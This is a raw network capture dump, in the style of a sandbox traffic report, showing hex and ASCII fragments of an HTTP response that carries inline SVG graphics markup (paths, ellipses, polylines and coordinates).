                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1733INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                  Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1749INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                  Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1765INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1781INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                  Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1797INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                  Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1813INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                  Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1829INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                  Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1845INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1861INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                  Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1877INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1893INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1909INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1957INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1973INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                  Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1989INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2005INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2021INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                  Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2037INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 